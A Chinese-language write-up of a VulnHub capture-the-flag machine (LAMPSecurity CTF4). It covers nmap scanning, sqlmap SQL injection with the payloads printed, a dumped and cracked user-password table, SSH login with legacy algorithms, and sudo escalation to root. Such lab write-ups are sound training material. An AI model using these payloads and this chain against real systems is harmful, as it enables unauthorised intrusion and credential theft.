靶机介绍
来自 vulnhub
主机发现
┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 10:30 CST
Nmap scan report for 192.168.50.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00021s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.154
Host is up (0.00012s latency).
MAC Address: 00:0C:29:82:96:4D (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F0:EB:77 (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.89 seconds┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.154
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 10:32 CST
Nmap scan report for 192.168.50.154
Host is up (0.00085s latency).
Not shown: 65512 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcp closed ipp
MAC Address: 00:0C:29:82:96:4D (VMware)Nmap done: 1 IP address (1 host up) scanned in 26.43 seconds┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo nmap -sT -sV -O -p22,25,80,631 192.168.50.154
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 10:33 CST
Nmap scan report for 192.168.50.154
Host is up (0.00028s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.5/8.13.5
80/tcp open http Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:82:96:4D (VMware)
Device type: general purpose|switch|remote management|terminal server|WAP|proxy server
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (95%), SNR embedded (93%), Control4 embedded (92%), Dell iDRAC 6 (92%), Lantronix embedded (92%), SonicWALL embedded (91%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/h:lantronix:slc_8 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1 cpe:/o:sonicwall:aventail_ex-6000
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (95%), Linux 2.6.13 - 2.6.32 (95%), SNR SNR-S2960 switch (93%), Linux 2.6.8 - 2.6.30 (92%), Control4 HC-300 home controller (92%), Linux 2.6.9 - 2.6.18 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Lantronix SLC 8 terminal server (Linux 2.6) (92%), OpenWrt Barrier Breaker (Linux 3.10) (92%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: UnixOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.74 secondsweb 渗透
看一看 80 端口
看到 blog 的地址有点意思,尝试注入
不能目录穿越
加个单引号看看有没有 sql 注入,报错显示可能存在 sql 注入
使用 sqlmap 开搞
┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo sqlmap -u "http://192.168.50.154/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch_____H__ ___ ___["]_____ ___ ___ {1.8.8#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 16:15:24 /2024-09-22/[16:15:24] [INFO] testing connection to the target URL
[16:15:25] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:15:25] [INFO] testing if the target URL content is stable
[16:15:25] [INFO] target URL content is stable
[16:15:25] [INFO] testing if GET parameter 'page' is dynamic
[16:15:25] [INFO] GET parameter 'page' appears to be dynamic[16:15:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 202 HTTP(s) requests:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: page=blog&title=Blog&id=2 AND 4384=4384Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: page=blog&title=Blog&id=2 AND (SELECT 2095 FROM (SELECT(SLEEP(5)))vaXr)Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171787071,0x415268624c754c43496a5357775a7770505557625273597a6d7943717a4d676c514a68444e704450,0x7162787671)-- -
---
[16:15:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: PHP 5.1.2, Apache 2.2.0
back-end DBMS: MySQL >= 5.0.12
[16:15:36] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test[16:15:36] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:15:36] [INFO] starting 6 processes
[16:15:37] [INFO] cracked password 'Homesite' for user 'pmoore'
[16:15:37] [INFO] cracked password 'Sue1978' for user 'jdurbin'
[16:15:37] [INFO] cracked password 'ilike2surf' for user 'dstevens'
[16:15:38] [INFO] cracked password 'pacman' for user 'sorzek'
[16:15:38] [INFO] cracked password 'undone1' for user 'ghighland'
[16:15:38] [INFO] cracked password 'seventysixers' for user 'achen'
Database: ehks
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+--------------------------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
+---------+-----------+--------------------------------------------------+[16:15:39] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.154/dump/ehks/user.csv'
[16:15:39] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.154'[*] ending @ 16:15:39 /2024-09-22/SSH 参数补写
┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo ssh dstevens@192.168.50.154
Unable to negotiate with 192.168.50.154 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.50.154
Unable to negotiate with 192.168.50.154 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss┌──(kali㉿kali)-[~/testLampSecurityCTF4]
└─$ sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.50.154
The authenticity of host '192.168.50.154 (192.168.50.154)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.50.154' (RSA) to the list of known hosts.
BSD SSH 4.1
dstevens@192.168.50.154's password:
Last login: Wed Mar 11 09:45:34 2009
[dstevens@ctf4 ~]$ 初级 shell
看看这个初级 shell 都有啥
[dstevens@ctf4 ~]$
[dstevens@ctf4 ~]$ whoami
dstevens
[dstevens@ctf4 ~]$ ip addr
-bash: ip: command not found
[dstevens@ctf4 ~]$ pwd
/home/dstevens
[dstevens@ctf4 ~]$ ls
Desktop html install.log mail software
[dstevens@ctf4 ~]$ 提权
直接提权,因为当前用户 dstevens 有全部权限
[dstevens@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 athlon i386 GNU/Linux
[dstevens@ctf4 ~]$ sudo -l
Password:
User dstevens may run the following commands on this host:(ALL) ALL
[dstevens@ctf4 ~]$ sudo /bin/bash
[root@ctf4 ~]# whoami
root
[root@ctf4 ~]# ip addr
bash: ip: command not found
[root@ctf4 ~]# ifconfig
bash: ifconfig: command not found
[root@ctf4 ~]# 总结
主机发现
在端口上,发现 80 端口是一个博客的站
观察 url 的特征,发现可能存在 sql 注入
通过 sqlmap 注入,拿到账号密码
使用 ssh 登录,对 ssh 参数进行调整
拿到初级 shell
检查当前用户的权限,使用 /bin/bash 提权,拿到 root
结束
结语
这台靶机较简单,如果使用 sqlmap。这意味着可用手工注入,如果想深入学习就用手工注入做一遍吧😄
渗透工具对渗透来说是最不重要的
工具在真正的渗透中不适用,因为工具会携带特征码,容易被防火墙拦截
只有懂得 sql 注入,如判断列,order,concat 等等,在内网没有工具时也能进行渗透测试
burpsuit,metasploit,sqlmap,等等工具,都是如此吧
(来自红笔老师的指点)
